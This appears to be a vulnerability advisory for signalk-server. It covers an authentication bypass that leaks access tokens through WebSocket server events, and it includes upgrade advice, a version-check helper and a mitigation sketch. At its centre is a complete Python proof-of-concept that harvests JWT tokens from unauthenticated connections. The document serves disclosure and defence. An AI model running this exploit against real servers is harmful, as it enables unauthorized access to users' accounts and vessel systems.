Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade signalk-server to version 2.19.0-beta.5 or higher.
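To confirm that an installed copy already includes the fix, its version string can be compared against 2.19.0-beta.5. The sketch below is a simplified comparison that assumes npm-style semantic version strings; `parse_version` and `is_patched` are hypothetical helper names and are not part of signalk-server.

```python
import re

FIXED_VERSION = "2.19.0-beta.5"  # first fixed release named in the advisory


def parse_version(version):
    """Turn 'MAJOR.MINOR.PATCH[-prerelease]' into a sortable key (simplified semver)."""
    match = re.fullmatch(
        r"v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+.*)?", version.strip()
    )
    if match is None:
        raise ValueError(f"unrecognized version: {version!r}")
    major, minor, patch, pre = match.groups()
    if pre is None:
        # A plain release sorts after every prerelease of the same core version.
        pre_key = (1,)
    else:
        parts = []
        for ident in pre.split("."):
            # Numeric identifiers compare as numbers and sort before textual ones.
            parts.append((0, int(ident), "") if ident.isdigit() else (1, 0, ident))
        pre_key = (0, tuple(parts))
    return (int(major), int(minor), int(patch)), pre_key


def is_patched(installed_version):
    """True if installed_version is at or above the fixed release."""
    return parse_version(installed_version) >= parse_version(FIXED_VERSION)


if __name__ == "__main__":
    for candidate in ("2.18.0", "2.19.0-beta.4", "2.19.0-beta.5", "2.19.0"):
        print(candidate, "patched" if is_patched(candidate) else "VULNERABLE")
```

The installed version can be read from the `version` field of the package's `package.json`; build metadata after `+` is ignored by this sketch.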
signalk-server is an implementation of a Signal K server for boats.
Affected versions of this package are vulnerable to Authentication Bypass Using an Alternate Path or Channel via the startServerEvents and queryRequest functions. When allow_readonly is enabled, an unauthenticated attacker can obtain authentication tokens for any user by enumerating WebSocket events to discover access request IDs and then polling the access request status endpoint to retrieve issued tokens.
import json, websocket, requests, time

TARGET_IP, TARGET_PORT = "localhost", 3000
TARGET_WS = f"ws://{TARGET_IP}:{TARGET_PORT}"
TARGET_HTTP = f"http://{TARGET_IP}:{TARGET_PORT}"


def poll_for_token(request_id, href):
    print(f"[*] Polling started for request {request_id}")
    url = f"{TARGET_HTTP}{href}"
    while True:
        try:
            r = requests.get(url)
            if r.status_code == 200:
                data = r.json()
                state = data.get("state")
                print(f"[.] Request {request_id} state: {state}")
                if state == "COMPLETED":
                    access_req = data.get("accessRequest", {})
                    permission = access_req.get("permission")
                    token = access_req.get("token")
                    print(f"[*] Request completed - Permission: {permission}, Token present: {bool(token)}")
                    if token:
                        print(f"[+] TOKEN STOLEN")
                        print(f"[+] Permission: {permission}")
                        print(f"[+] JWT Token: {token}")
                        return token
                    else:
                        print(f"[-] Request {request_id} denied or no token")
                        return None
            else:
                print(f"[-] HTTP {r.status_code} for request {request_id}")
        except Exception as e:
            print(f"[-] Error polling {request_id}: {e}")
        time.sleep(5)


def monitor_and_steal_tokens():
    uri = f"{TARGET_WS}/signalk/v1/stream?serverevents=all"
    print(f"[*] Connecting to {uri}")
    ws = websocket.create_connection(uri)
    print("[+] Connected, monitoring for ACCESS_REQUEST events...")
    while True:
        message = ws.recv()
        msg = json.loads(message)
        if msg.get("type") == "ACCESS_REQUEST":
            print("[+] ACCESS_REQUEST event received!")
            data = msg.get("data", [])
            if data:
                req = data[0]
                request_id = req.get('requestId')
                permissions = req.get('clientRequest', {}).get('permissions')
                href = req.get('href', f'/signalk/v1/requests/{request_id}')
                print(f"[*] Found request: {request_id}")
                print(f"[*] Closing WebSocket and starting polling...")
                ws.close()
                poll_for_token(request_id, href)
                break


if __name__ == "__main__":
    monitor_and_steal_tokens()
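The script above only works because ACCESS_REQUEST events, which carry request IDs, reach a WebSocket client that never authenticated. The sketch below illustrates the general mitigation idea of filtering sensitive server events by the connection's authentication state. It is not the actual signalk-server patch (the server is not written in Python); `Connection`, `SENSITIVE_EVENT_TYPES`, and `events_for` are hypothetical names, and restricting these events to administrators is an assumption made for illustration.

```python
from dataclasses import dataclass

# Event types treated as sensitive in this sketch. ACCESS_REQUEST is the type
# seen in the proof of concept; the set itself is an assumption.
SENSITIVE_EVENT_TYPES = frozenset({"ACCESS_REQUEST"})


@dataclass(frozen=True)
class Connection:
    """Hypothetical stand-in for the auth state of one WebSocket client."""
    authenticated: bool
    is_admin: bool = False


def events_for(connection, events):
    """Return only the server events this connection is allowed to receive."""
    may_see_sensitive = connection.authenticated and connection.is_admin
    allowed = []
    for event in events:
        if event.get("type") in SENSITIVE_EVENT_TYPES and not may_see_sensitive:
            continue  # drop events that would leak access request IDs
        allowed.append(event)
    return allowed


if __name__ == "__main__":
    pending = [
        {"type": "VESSEL_INFO", "data": {"name": "demo"}},
        {"type": "ACCESS_REQUEST", "data": [{"requestId": "example-id"}]},
    ]
    anonymous = Connection(authenticated=False)
    admin = Connection(authenticated=True, is_admin=True)
    print([e["type"] for e in events_for(anonymous, pending)])
    print([e["type"] for e in events_for(admin, pending)])
```

Filtering events addresses only the discovery half of the attack. A complete fix would also need the access request status endpoint to release a token only to the client that created the request.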